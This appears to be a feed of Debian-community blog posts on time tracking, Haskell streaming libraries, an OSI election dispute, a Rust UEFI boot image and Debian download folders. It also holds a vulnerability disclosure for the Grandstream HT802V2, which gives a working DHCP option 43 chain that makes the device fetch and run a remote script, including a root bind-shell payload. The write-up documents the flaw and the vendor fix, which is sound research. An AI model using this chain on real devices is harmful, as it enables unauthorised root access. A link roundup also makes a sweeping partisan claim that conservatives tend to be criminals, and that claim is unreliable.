  (225990 / 3600) − (183762 / 3600) = 11:43:48
I also often want to work out how much of my time I’ve spent on Debian work this month so far, since Freexian pays me for up to 20% of my work time on Debian; if I’m under that then I might want to prioritize more Debian projects, and if I’m over then I should be prioritizing more Freexian projects as otherwise I’m not going to get paid for that time.
$ summarize-time -t :month Freexian
Total time: 69:19:42

$ summarize-time -t :month Debian
Total time: 24:05:30

$ qalc '24:05:30 / (24:05:30 + 69:19:42) to %'

  (86730 / 3600) / ((86730 / 3600) + (249582 / 3600)) ≈ 25.78855349%
I love it.
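(As an aside, if you do stay in Python for this one calculation, `timedelta` supports true division, so at least the percentage is painless; numbers below are the ones from my month so far:)

```python
from datetime import timedelta

debian = timedelta(hours=24, minutes=5, seconds=30)
freexian = timedelta(hours=69, minutes=19, seconds=42)

# Dividing one timedelta by another yields a plain float.
share = debian / (debian + freexian)
print(f"{share:.2%}")  # 25.79%
```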
23 February, 2025 08:00PM by Colin Watson
For my PhD, my colleagues/collaborators and I built a distributed stream-processing system using Haskell. There are several other Haskell stream-processing systems. How do they compare?
First, let's briefly discuss and define streaming in this context.
Structure and Interpretation of Computer Programs introduces Streams as an analogue of lists, to support delayed evaluation. In brief, the inductive list type (a list is either an empty list or a head element pre-pended to another list) is replaced with a structure with a head element and a promise which, when evaluated, will generate the tail (which in turn may have a head element and a promise to generate another tail, culminating in the equivalent of an empty list.) Later on SICP also covers lazy evaluation.
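That head-plus-promise structure can be sketched in a few lines of Python rather than Scheme, purely for illustration (a zero-argument lambda stands in for the promise):

```python
# SICP-style stream: a pair of a head element and a zero-argument
# "promise" that builds the tail only when forced.
def integers_from(n):
    return (n, lambda: integers_from(n + 1))

def take(stream, count):
    # Force promises one at a time to realise a finite prefix
    # of a conceptually infinite stream.
    out = []
    while count > 0:
        head, tail_promise = stream
        out.append(head)
        stream = tail_promise()
        count -= 1
    return out

print(take(integers_from(1), 5))  # [1, 2, 3, 4, 5]
```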
However, the streaming we're talking about originates in the relational community, rather than the functional one, and is subtly different. It's about building a pipeline of processing that receives and emits data but doesn't need to (indeed, cannot) reference the whole stream (which may be infinite) at once.
Now let's go over some Haskell streaming systems.
Conduit is the oldest of the ones I am reviewing here, but I doubt it's the first in the Haskell ecosystem. If I've made any obvious omissions, please let me know!
Conduit provides a new set of types to model streaming data, and a completely
new set of functions which are analogues of standard Prelude functions, e.g.
sumC
in place of sum
. It provides its own combinator(s) such as .|
(
aka fuse)
which is like composition but reads left-to-right.
The motivation for this is to enable (near?) constant memory usage for processing large streams of data -- presumably versus using a list-based approach and to provide some determinism: the README gives the example of "promptly closing file handles". I think this is another way of saying that it uses strict evaluation, or at least avoids lazy evaluation for some things.
Conduit offers interleaved effects: which is to say, IO can be performed mid-stream.
Conduit supports distributed operation via Data.Conduit.Network
in the
conduit-extra
package. Michael Snoyman, principal Conduit author, wrote
up how to use it here: https://www.yesodweb.com/blog/2014/03/network-conduit-async
To write a distributed Conduit application, the application programmer must
manually determine the boundaries between the clients/servers and write specific
code to connect them.
The Pipes Tutorial contrasts itself with "Conventional Haskell stream programming": whether that means Conduit or something else, I don't know.
Paraphrasing their pitch: Effects, Streaming, Composability: pick two. That's the situation they describe for stream programming prior to Pipes. They argue that Pipes offers all three.
Pipes offers its own combinators (which read left-to-right) and supports interleaved effects.
At this point I can't really see what fundamentally distinguishes Pipes from Conduit.
Pipes has some support for distributed operation via the sister library
pipes-network. It
looks like you must send and receive ByteString
s, which means rolling
your own serialisation for other types. As with Conduit, to send or receive
over a network, the application programmer must divide their program up
into the sub-programs for each node, and add the necessary ingress/egress
code.
io-streams emphasises simple primitives. Reading and writing is done
under the IO Monad, thus, in an effectful (but non-pure) context. The
presence or absence of further stream data is signalled by using the
Maybe
type (Just
more data or Nothing
: the producer has finished.)
It provides a library of functions that shadow the standard Prelude, such
as S.fromList
, S.mapM
, etc.
It's not clear to me what the motivation for io-streams is, beyond providing a simple interface. There's no declaration of intent that I can find about (e.g.) constant-memory operation.
There's no mention of or support (that I can find) for distributed operation.
Similar to io-streams, Streaming emphasises providing a simple
interface that gels well with traditional Haskell methods. Streaming
provides effectful streams (via a Monad -- any Monad?) and a collection
of functions for manipulating streams which are designed to closely
mimic standard Prelude (and Data.List
) functions.
Streaming doesn't push its own combinators: the examples provided
use $
and read right-to-left.
The motivation for Streaming seems to be to avoid memory leaks caused by
extracting pure lists from IO with traditional functions like mapM
,
which require all the list constructors to be evaluated, the list to be
completely deconstructed, and then a new list constructed.
Like io-streams, the focus of the library is providing a low-level streaming abstraction, and there is no support for distributed operation.
Streamly appears to have the grand goal of providing a unified programming tool as suited for quick-and-dirty programming tasks (normally the domain of scripting languages) as for high-performance work (C, Java, Rust, etc.). Their intended audience appears to be everyone, or at least, not just existing Haskell programmers. See their rationale.
Streamly offers an interface to permit composing concurrent (note: not distributed) programs via combinators. It relies upon fusing a streaming pipeline to remove intermediate list structure allocations and de-allocations (i.e. de-forestation, similar to GHC rewrite rules).
The examples I've seen use standard combinators (e.g. Control.Function.&
,
which reads left-to-right, and Applicative
).
Streamly provides benchmarks versus Haskell pure lists, Streaming, Pipes and Conduit: these generally show Streamly several orders of magnitude faster.
I'm finding it hard to evaluate Streamly. It's big, and its focus is wide. It provides shadows of Prelude functions, as many of these libraries do.
It seems almost like it must be a rite-of-passage to write a streaming system in Haskell. Stones and glass houses, I'm guilty of that too.
The focus of the surveyed libraries is mostly on providing a streaming abstraction, normally with an analogous interface to standard Haskell lists. They differ on various philosophical points (whether to abstract away the mechanics behind type synonyms, how much to leverage existing Haskell idioms, etc). A few of the libraries have some rudimentary support for distributed operation, but this is limited to connecting separate nodes together: in some cases serialising data remains the application programmer's job, and in all cases the application programmer must manually carve up their processing according to a fixed idea of what nodes they are deploying to. They all define a fixed-function pipeline.
The Open Source Initiative has two classes of board seats: Affiliate seats, and Individual Member seats.
In the upcoming election, each affiliate can nominate a candidate, and each affiliate can cast a vote for the Affiliate candidates, but there's only 1 Affiliate seat available. I initially expressed interest in being nominated as an Affiliate candidate via Debian. But since Bradley Kuhn is also running for an Affiliate seat with a similar platform to me, especially with regards to the OSAID, I decided to run as part of an aligned "ticket" as an Individual Member to avoid contention for the 1 Affiliate seat.
Bradley and I discussed running on a similar ticket around 8/9pm Pacific, and I submitted my candidacy around 9pm PT on 17 February.
I was dismayed when I received the following mail from Nick Vidal:
Dear Luke,
Thank you for your interest in the OSI Board of Directors election. Unfortunately, we are unable to accept your application as it was submitted after the official deadline of Monday Feb 17 at 11:59 pm UTC. To ensure a fair process, we must adhere to the deadline for all candidates.
We appreciate your enthusiasm and encourage you to stay engaged with OSI’s mission. We hope you’ll consider applying in the future or contributing in other meaningful ways.
Best regards,
OSI Election Teams
Nowhere on the "OSI’s board of directors in 2025: details about the elections" page do they list a timezone for closure of nominations; they simply list Monday 17 February.
The OSI's contact address is in California, so it seems arbitrary and capricious to retroactively define all of these processes as being governed by UTC.
I was not able to participate in the "potential board director" info sessions accordingly, but people who attended heard that the importance of accommodating differing TZ's was discussed during the info session, and that OSI representatives mentioned they try to accommodate TZ's of everyone. This seems in sharp contrast with the above policy.
I urge the OSI to reconsider this policy and allow me to stand for an Individual seat in the current cycle.
21 February, 2025 10:35AM by Luke Faraone (noreply@blogger.com)
Oliver Lindburg wrote an interesting article about Designing for Crisis [1].
Anarcat has an interesting review of qalc which is a really good calculator, I’ll install it on all my workstations [3]. It even does furlongs per fortnight! This would be good to be called from an LLM system when someone asks about mathematical things.
Krebs has an informative article about a criminal employed by Elon’s DOGE [4]. Conservatives tend to be criminals.
Krebs wrote an interesting article about the security of the iOS (and presumably Android) apps for DeepSeek [5]. Seems that the DeepSeek people did everything wrong.
Bruce Schneier and Davi Ottenheimer wrote an insightful article DOGE as a National Cyberattack [6].
This youtube video about designing a compressed air engine for a model plane is interesting [9].
ArsTechnica has an informative article about device code phishing [12]. The increased use of single-sign-on is going to make this more of a problem.
Shrivu wrote an insightful and informative article on how to backdoor LLMs [13].
21 February, 2025 08:00AM by etbe
I can’t remember exactly the joke I was making at the time in my work’s slack instance (I’m sure it wasn’t particularly funny, though; and not even worth re-reading the thread to work out), but it wound up with me writing a UEFI binary for the punchline. Not to spoil the ending but it worked - no pesky kernel, no messing around with “userland”. I guess the only part of this you really need to know for the setup here is that it was a Severance joke, which is some fantastic TV. If you haven’t seen it, this post will seem perhaps weirder than it actually is. I promise I haven’t joined any new cults. For those who have seen it, the payoff to my joke is that I wanted my machine to boot directly to an image of Kier Eagan.
As for how to do it – I figured I’d give the uefi crate a shot, and see how it is to use, since this is a low stakes way of trying it out. In general, this isn’t the sort of thing I’d usually post about – except this wound up being easier and way cleaner than I thought it would be. That alone is worth sharing, in the hopes someone comes across this in the future and feels like they, too, can write something fun targeting the UEFI.
First things first – gotta create a rust project (I’ll leave that part to you
depending on your life choices), and to add the uefi
crate to your
Cargo.toml
. You can either use cargo add
or add a line like this by hand:
uefi = { version = "0.33", features = ["panic_handler", "alloc", "global_allocator"] }
We also need to teach cargo about how to go about building for the UEFI target,
so we need to create a rust-toolchain.toml
with one (or both) of the UEFI
targets we’re interested in:
[toolchain]
targets = ["aarch64-unknown-uefi", "x86_64-unknown-uefi"]
Unfortunately, I wasn’t able to use the
image crate,
since it won’t build against the uefi
target. This looks like it’s
because rustc had no way to compile the required floating point operations
within the image
crate without hardware floating point instructions
specifically. Rust tends to punt a lot of that to libm
usually, so this isn’t
entirely shocking given we’re no_std
for a non-hardfloat target.
So-called “softening” requires a software floating point implementation that
the compiler can use to “polyfill” (feels weird to use the term polyfill here,
but I guess it’s spiritually right?) the lack of hardware floating point
operations, which rust hasn’t implemented for this target yet. As a result, I
changed tactics, and figured I’d use ImageMagick
to pre-compute the pixels
from a jpg
, rather than doing it at runtime. A bit of a bummer, since I need
to do more out of band pre-processing and hardcoding, and updating the image
kinda sucks as a result – but it’s entirely manageable.
$ convert -resize 1280x900 kier.jpg kier.full.jpg
$ convert -depth 8 kier.full.jpg rgba:kier.bin
This will take our input file (kier.jpg
), resize it to get as close to the
desired resolution as possible while maintaining aspect ratio, then convert it
from a jpg
to a flat array of 4 byte RGBA
pixels. Critically, it’s also
important to remember that the size of the kier.full.jpg
file may not actually
be the requested size – it will not change the aspect ratio, so be sure to
make a careful note of the resulting size of the kier.full.jpg
file.
Last step with the image is to compile it into our Rust binary, since we don’t want to struggle with trying to read this off disk, which is thankfully real easy to do.
const KIER: &[u8] = include_bytes!("../kier.bin");
const KIER_WIDTH: usize = 1280;
const KIER_HEIGHT: usize = 641;
const KIER_PIXEL_SIZE: usize = 4;
Remember to use the width and height from the final kier.full.jpg
file as the
values for KIER_WIDTH
and KIER_HEIGHT
. KIER_PIXEL_SIZE
is 4, since we
have 4 byte wide values for each pixel as a result of our conversion step into
RGBA. We’ll only use RGB, and if we ever drop the alpha channel, we can drop
that down to 3. I don’t entirely know why I kept alpha around, but I figured it
was fine. My kier.full.jpg
image winds up shorter than the requested height
(which is also qemu’s default resolution for me) – which means we’ll get a
semi-annoying black band under the image when we go to run it – but it’ll
work.
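Since the buffer is a flat RGBA byte array in row-major order, pixel (x, y) lives at byte offset ((y * width) + x) * 4. Here's a tiny Python sketch of that arithmetic (the 2×2 buffer and names here are toy stand-ins, not the real kier.bin):

```python
# Toy stand-in for the kier.bin buffer: a 2x2 RGBA image, row-major.
WIDTH, HEIGHT, PIXEL_SIZE = 2, 2, 4

data = bytes([
    255, 0, 0, 255,     0, 255, 0, 255,      # row 0: red, green
    0, 0, 255, 255,     255, 255, 255, 255,  # row 1: blue, white
])

def pixel(x, y):
    # Same index arithmetic as the pixel loop:
    # idx = ((y * WIDTH) + x) * PIXEL_SIZE
    idx = ((y * WIDTH) + x) * PIXEL_SIZE
    return data[idx], data[idx + 1], data[idx + 2]  # R, G, B; alpha ignored

print(pixel(1, 0))  # (0, 255, 0) -- the green pixel
```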
Anyway, now that we have our image as bytes, we can get down to work and write the rest of the code to handle moving bytes around in memory as a flat block of pixels, and request that they be displayed using the UEFI GOP. We’ll just need to hack up a container for the image pixels and teach it how to blit to the display.
/// RGB Image to move around. This isn't the same as an
/// `image::RgbImage`, but we can associate the size of
/// the image along with the flat buffer of pixels.
struct RgbImage {
/// Size of the image as a tuple, as the
/// (width, height)
size: (usize, usize),
/// raw pixels we'll send to the display.
inner: Vec<BltPixel>,
}
impl RgbImage {
/// Create a new `RgbImage`.
fn new(width: usize, height: usize) -> Self {
RgbImage {
size: (width, height),
inner: vec![BltPixel::new(0, 0, 0); width * height],
}
}
/// Take our pixels and request that the UEFI GOP
/// display them for us.
fn write(&self, gop: &mut GraphicsOutput) -> Result {
gop.blt(BltOp::BufferToVideo {
buffer: &self.inner,
src: BltRegion::Full,
dest: (0, 0),
dims: self.size,
})
}
}
impl Index<(usize, usize)> for RgbImage {
type Output = BltPixel;
fn index(&self, idx: (usize, usize)) -> &BltPixel {
let (x, y) = idx;
&self.inner[y * self.size.0 + x]
}
}
impl IndexMut<(usize, usize)> for RgbImage {
fn index_mut(&mut self, idx: (usize, usize)) -> &mut BltPixel {
let (x, y) = idx;
&mut self.inner[y * self.size.0 + x]
}
}
We also need to do some basic setup to get a handle to the UEFI
GOP via the UEFI crate (using
uefi::boot::get_handle_for_protocol
and
uefi::boot::open_protocol_exclusive
for the GraphicsOutput
protocol), so that we have the object we need to pass to RgbImage
in order
for it to write the pixels to the display. The only trick here is that the
display on the booted system can really be any resolution – so we need to do
some capping to ensure that we don’t write more pixels than the display can
handle. Writing fewer than the display’s maximum seems fine, though.
fn praise() -> Result {
let gop_handle = boot::get_handle_for_protocol::<GraphicsOutput>()?;
let mut gop = boot::open_protocol_exclusive::<GraphicsOutput>(gop_handle)?;
// Get the (width, height) that is the minimum of
// our image and the display we're using.
let (width, height) = gop.current_mode_info().resolution();
let (width, height) = (width.min(KIER_WIDTH), height.min(KIER_HEIGHT));
let mut buffer = RgbImage::new(width, height);
for y in 0..height {
for x in 0..width {
let idx_r = ((y * KIER_WIDTH) + x) * KIER_PIXEL_SIZE;
let pixel = &mut buffer[(x, y)];
pixel.red = KIER[idx_r];
pixel.green = KIER[idx_r + 1];
pixel.blue = KIER[idx_r + 2];
}
}
buffer.write(&mut gop)?;
Ok(())
}
Not so bad! A bit tedious – we could solve some of this by turning
KIER
into an RgbImage
at compile-time using some clever Cow
and
const
tricks and implement blitting a sub-image of the image – but this
will do for now. This is a joke, after all, let’s not go nuts. All that’s
left with our code is for us to write our main
function and try and boot
the thing!
#[entry]
fn main() -> Status {
uefi::helpers::init().unwrap();
praise().unwrap();
boot::stall(100_000_000);
Status::SUCCESS
}
If you’re following along at home and so interested, the final source is over at
gist.github.com.
We can go ahead and build it using cargo
(as is our tradition) by targeting
the UEFI platform.
$ cargo build --release --target x86_64-unknown-uefi
While I can definitely get my machine to boot these blobs to test, I figured
I’d save myself some time by using QEMU to test without a full boot.
If you’ve not done this sort of thing before, we’ll need two packages,
qemu
and ovmf
. It’s a bit different than most invocations of qemu you
may see out there – so I figured it’d be worth writing this down, too.
$ doas apt install qemu-system-x86 ovmf
qemu
has a nice feature where it’ll create us an EFI partition as a drive and
attach it to the VM off a local directory – so let’s construct an EFI
partition file structure, and drop our binary into the conventional location.
If you haven’t done this before, and are only interested in running this in a
VM, don’t worry too much about it, a lot of it is convention and this layout
should work for you.
$ mkdir -p esp/efi/boot
$ cp target/x86_64-unknown-uefi/release/*.efi \
esp/efi/boot/bootx64.efi
With all this in place, we can kick off qemu
, booting it in UEFI mode using
the ovmf
firmware, attaching our EFI partition directory as a drive to
our VM to boot off of.
$ qemu-system-x86_64 \
-enable-kvm \
-m 2048 \
-smbios type=0,uefi=on \
-bios /usr/share/ovmf/OVMF.fd \
-drive format=raw,file=fat:rw:esp
If all goes well, soon you’ll be met with the all knowing gaze of
Chosen One, Kier Eagan. The thing that really impressed me about all
this is this program worked first try – it all went so boringly
normal. Truly, kudos to the uefi
crate maintainers, it’s incredibly
well done.
Sure, we could stop here, but anyone can open up an app window and see a picture of Kier Eagan, so I knew I needed to finish the job and boot a real machine up with this. In order to do that, we need to format a USB stick. BE SURE /dev/sda IS CORRECT IF YOU’RE COPY AND PASTING. All my drives are NVMe, so BE CAREFUL – if you use SATA, it may very well be your hard drive! Please do not destroy your computer over this.
$ doas fdisk /dev/sda
Welcome to fdisk (util-linux 2.40.4).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1):
First sector (2048-4014079, default 2048):
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-4014079, default 4014079):
Created a new partition 1 of type 'Linux' and of size 1.9 GiB.
Command (m for help): t
Selected partition 1
Hex code or alias (type L to list all): ef
Changed type of partition 'Linux' to 'EFI (FAT-12/16/32)'.
Command (m for help): w
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.
Once that looks good (depending on your flavor of udev
you may or
may not need to unplug and replug your USB stick), we can go ahead
and format our new EFI partition (BE CAREFUL THAT /dev/sda IS YOUR
USB STICK) and write our EFI directory to it.
$ doas mkfs.fat /dev/sda1
$ doas mount /dev/sda1 /mnt
$ cp -r esp/efi /mnt
$ find /mnt
/mnt
/mnt/efi
/mnt/efi/boot
/mnt/efi/boot/bootx64.efi
Of course, naturally, devotion to Kier shouldn’t mean backdooring your system.
Disabling Secure Boot runs counter to the Core Principles, such as Probity, and
not doing this would surely run counter to Verve, Wit and Vision. This bit does
require that you’ve taken the step to enroll a
MOK and know how
to use it, right about now is when we can use sbsign
to sign our UEFI binary
we want to boot from to continue enforcing Secure Boot. The details for how
this command should be run specifically are likely something you’ll need to work
out depending on how you’ve decided to manage your MOK.
$ doas sbsign \
--cert /path/to/mok.crt \
--key /path/to/mok.key \
target/x86_64-unknown-uefi/release/*.efi \
--output esp/efi/boot/bootx64.efi
I figured I’d leave a signed copy of boot2kier
at
/boot/efi/EFI/BOOT/KIER.efi
on my Dell XPS 13, with Secure Boot enabled
and enforcing, just took a matter of going into my BIOS to add the right
boot option, which was no sweat. I’m sure there is a way to do it using
efibootmgr
, but I wasn’t smart enough to do that quickly. I let ‘er rip,
and it booted up and worked great!
It was a bit hard to get a video of my laptop, though – but lucky for me, I have a Minisforum Z83-F sitting around (which, until a few weeks ago was running the annual http server to control my christmas tree ) – so I grabbed it out of the christmas bin, wired it up to a video capture card I have sitting around, and figured I’d grab a video of me booting a physical device off the boot2kier USB stick.
Attentive readers will notice the image of Kier is smaller than on the qemu-booted system – which just means our real machine has a larger GOP display resolution than qemu, which makes sense! We could write some fancy resize code (sounds annoying), center the image (can’t be assed but should be the easy way out here) or resize the original image (pretty hardware specific workaround). Additionally, you can make out the image being written to the display before us (the Minisforum logo) behind Kier, which is really cool stuff. If we were real fancy we could write blank pixels to the display before blitting Kier, but, again, I don’t think I care to do that much work.
If I wanted to keep this joke going, I’d likely try and find a copy of the original video when Helly 100%s her file and boot into that – or maybe play a terrible midi PC speaker rendition of Kier, Chosen One, Kier after rendering the image. I, unfortunately, don’t have any friends involved with production (yet?), so I reckon all that’s out for now. I’ll likely stop playing with this – the joke was done and I’m only writing this post because of how great everything was along the way.
All in all, this reminds me so much of building a homebrew kernel to boot a
system into – but like, good, though, and it’s a nice reminder of both how
fun this stuff can be, and how far we’ve come. UEFI protocols are light-years
better than how we did it in the dark ages, and the tooling for this is SO
much more mature. Booting a custom UEFI binary is miles ahead of trying to
boot your own kernel, and I can’t believe how good the uefi
crate is
specifically.
Praise Kier! Kudos, to everyone involved in making this so delightful ❤️.
The Grandstream HT802V2 uses busybox' udhcpc
for DHCP.
When a DHCP event occurs, udhcpc
calls a script (/usr/share/udhcpc/default.script
by default) to further process the received data.
On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor
.
…
[ -n "$vendor" ] && {
	VENDOR_TEST_SERVER="`echo $vendor | parse_vendor | grep gs_test_server | cut -d' ' -f2`"
	if [ -n "$VENDOR_TEST_SERVER" ]; then
		/app/bin/vendor_test_suite.sh $VENDOR_TEST_SERVER
	fi
…
According to the documentation the format is <option_code><value_length><value>
.
The only documented option code is 0x01
for the ACS URL.
However, if you pass other codes, these are accepted and parsed too.
In particular, if you pass 0x05
you get gs_test_server
, which is passed in a call to /app/bin/vendor_test_suite.sh
.
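As a sketch of that <option_code><value_length><value> layout: the helper below is a hypothetical Python re-implementation, not the proprietary /sbin/parse_vendor binary, and the option names are assumptions based on the behavior described here (0x01 for the ACS URL, 0x05 for gs_test_server):

```python
# Hypothetical re-implementation of the TLV parsing that /sbin/parse_vendor
# appears to perform; option names are assumptions, not taken from firmware.
OPTION_NAMES = {0x01: "gs_acs_url", 0x05: "gs_test_server"}

def parse_vendor_tlv(data: bytes) -> dict:
    """Walk the <code><length><value> stream, return {name: value}."""
    opts = {}
    i = 0
    while i + 2 <= len(data):
        code, length = data[i], data[i + 1]
        value = data[i + 2:i + 2 + length].decode("ascii")
        opts[OPTION_NAMES.get(code, f"opt_{code:#04x}")] = value
        i += 2 + length
    return opts

# The payload used later in this post: code 0x05, length 0x0e, then the IP.
payload = bytes([0x05, 0x0e]) + b"192.168.42.222"
print(parse_vendor_tlv(payload))  # {'gs_test_server': '192.168.42.222'}
```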
What's /app/bin/vendor_test_suite.sh
? It's this nice script:
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080

cd /tmp
wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}
if [ "$?" = "0" ]; then
	echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
	chmod +x ${TEST_SCRIPT}
	corefile_dec ${TEST_SCRIPT}
	if [ "`head -n 1 ${TEST_SCRIPT}`" = "#!/bin/sh" ]; then
		echo "Starting GS Test Suite..."
		./${TEST_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
	fi
fi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh
and download it using wget
.
We could probably construct a gs_test_server
value in a way that makes wget
overwrite some system file, as was suggested in CVE-2021-37915.
But we can also just let the script download the file and execute it for us.
The only hurdle is that the downloaded file gets decrypted using corefile_dec
and the result needs to have #!/bin/sh
as the first line to be executed.
I have no idea how the encryption works.
But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile
to encrypt things!
The result gets correctly decrypted by corefile_dec
back to the needed payload.
That means we can take a simple payload like:
#!/bin/sh
# you need exactly that shebang, yes

telnetd -l /bin/sh -p 1270 &
Encrypt it using encfile
and place it on a webserver as vendor_test.sh
.
The test machine has the IP 192.168.42.222
and python3 -m http.server 8080
runs the webserver on the right port.
This means the value of DHCP option 43 needs to be 05
(the option code), 0e
(14, the length of the IP address string) and then 192.168.42.222
.
In Python:
>>> server = "192.168.42.222"
>>> ":".join([f'{y:02x}' for y in [5, len(server)] + [ord(x) for x in server]])
'05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32'
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32
and trigger a DHCP run (/etc/init.d/udhcpc restart
if you have a shell, or a plain reboot if you don't).
And boom, root shell on port 1270
:)
As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server
NVRAM variable or via HTTP from the gs_test_server
NVRAM variable.
Both of these variables were controllable using the existing gs_config
interface after authentication.
But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :)
/usr/share/udhcpc/default.script
and /app/bin/vendor_test_suite.sh
look very similar, according to firmware dumps.
After disclosing this issue to Grandstream, they issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh
to:
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
VENDOR_SCRIPT="/tmp/run_vendor.sh"

cd /tmp
wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}
if [ "$?" = "0" ]; then
	echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
	chmod +x ${TEST_SCRIPT}
	prov_image_dec --in ${TEST_SCRIPT} --out ${VENDOR_SCRIPT}
	if [ "`head -n 1 ${VENDOR_SCRIPT}`" = "#!/bin/sh" ]; then
		echo "Starting GS Test Suite..."
		chmod +x ${VENDOR_SCRIPT}
		${VENDOR_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
	fi
fi
The crucial part is that now prov_image_dec
is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts.
20 February, 2025 11:38AM by evgeni
It's difficult to find the right Debian image. We have thousands of ISO files and cloud images and we support multiple CPU architectures and several download methods. The directory structure of our main image server is like a maze, and our web pages for downloading are also confusing.
Have you ever searched for a specific Debian image that was not the default netinst ISO for amd64? How long did it take to find it?
Debian is very good at hiding its images by offering a huge number of different versions and variants of images and multiple methods for downloading them. Debian also has multiple web pages for downloading.
This is the secret Debian maze of images. It is currently filled with 8700+ different ISO images and another 34,000+ files (raw and qcow2) for the cloud images.
The main URL for the server hosting all Debian images is https://cdimage.debian.org/cdimage/
There, you will find installer images, live images, cloud images
.
We have three different types of images:
Almost always, you are probably looking for the image to install the latest stable release. The URL https://cdimage.debian.org/cdimage/release/ shows:
12.9.0
12.9.0-live
current
current-live
but you cannot see that two are symlinks:
current -> 12.9.0/
current-live -> 12.9.0-live/
Here you will find the installer images and live images for the stable release (currently Debian 12, bookworm).
If you choose https://cdimage.debian.org/cdimage/release/12.9.0/ you will see a list of CPU architectures:
amd64
arm64
armel
armhf
i386
mips64el
mipsel
ppc64el
s390x
source
trace
(BTW, source and trace are not CPU architectures.)
The typical end user will not care about most architectures, because your computer will almost certainly need images from the amd64 folder. Maybe you have heard that your computer has a 64-bit CPU, and even if you have an Intel processor we call this architecture amd64.
Let's see what's in the folder amd64
:
bt-bd
bt-cd
bt-dvd
iso-bd
iso-cd
iso-dvd
jigdo-16G
jigdo-bd
jigdo-cd
jigdo-dlbd
jigdo-dvd
list-16G
list-bd
list-cd
list-dlbd
list-dvd
Wow. This is confusing, and there is no description of what all those folders mean.
The first three are different methods for downloading an image. Use iso when a single network connection will be fast enough for you. Using bt can result in a faster download, because it uses a peer-to-peer file-sharing protocol, but you need an additional torrent program for downloading.
Then we have these variants: the 16G
and dlbd
images are only available via jigdo.
All iso-xx
and bt-xx
folders provide the same images but with a
different access method.
Here are examples of images:
iso-cd/debian-12.9.0-amd64-netinst.iso
iso-cd/debian-edu-12.9.0-amd64-netinst.iso
iso-cd/debian-mac-12.9.0-amd64-netinst.iso
Fortunately the folder explains in great detail the differences between
these images and what else you will find there.
You can ignore the SHA...
files if you do not know what they are needed for.
They are not important for you.
These ISO files are small and contain only the core Debian installer
code and a small set of programs. If you install a desktop
environment, the other packages will be downloaded at the end of the installation.
The folders bt-dvd
and iso-dvd
only contain
debian-12.9.0-amd64-DVD-1.iso
or the appropriate torrent file.
In bt-bd
and iso-bd
you will only find debian-edu-12.9.0-amd64-BD-1.iso
.
These large images contain many more Debian packages, so you will not
need a network connection during the installation.
For the other CPU architectures (other than amd64) Debian provides fewer variants of images, but still a lot. In total, we have 44 ISO files (or torrents) for the current release of the Debian installer across all architectures. When using jigdo you can choose between 268 images.
And these are only the installer images for the stable release; no older or newer versions are counted here.
The live images in release/12.9.0-live/amd64/iso-hybrid/
are only available for the amd64 architecture, but for newer Debian releases
there will also be images for arm64.
We have seven different live images, each containing one of the most common desktop environments, plus one with only a text interface (standard).
debian-live-12.9.0-amd64-xfce.iso
debian-live-12.9.0-amd64-mate.iso
debian-live-12.9.0-amd64-lxqt.iso
debian-live-12.9.0-amd64-gnome.iso
debian-live-12.9.0-amd64-lxde.iso
debian-live-12.9.0-amd64-standard.iso
debian-live-12.9.0-amd64-cinnamon.iso
debian-live-12.9.0-amd64-kde.iso
The folder name iso-hybrid
refers to the technology that allows you to use those ISO files both for
burning onto a CD/DVD/BD and for writing the same ISO file to a USB stick.
bt-hybrid
will give you the torrent files for downloading the
same images using a torrent client program.
For newer versions of the images we currently have these folders:
daily-builds
weekly-builds
weekly-live-builds
trixie_di_alpha1
I suggest using the weekly-builds
, because in this folder you will find
a similar structure and all the variants of images as in the release
directory. For example:
weekly-builds/amd64/iso-cd/debian-testing-amd64-netinst.iso
and similar for the live images
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-kde.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-lxde.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-debian-junior.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-standard.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-lxqt.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-mate.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-xfce.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-gnome.iso
weekly-live-builds/amd64/iso-hybrid/debian-live-testing-amd64-cinnamon.iso
weekly-live-builds/arm64/iso-hybrid/debian-live-testing-arm64-gnome.iso
Here you see a new variant called debian-junior
, which is a Debian
blend. BitTorrent files are not available for weekly builds.
The daily-builds
folder structure is different: it provides only the small network-install
(netinst) ISOs, but several versions from the last
days. Currently we have 55 ISO files available there.
If you like to use the newest installation image fetch this one:
Unfortunately Debian does not provide any installation media based on the stable release but including a backports kernel for newer hardware. This is because our installer environment is a very complex mix of special tools (like anna) and special .udeb versions of packages.
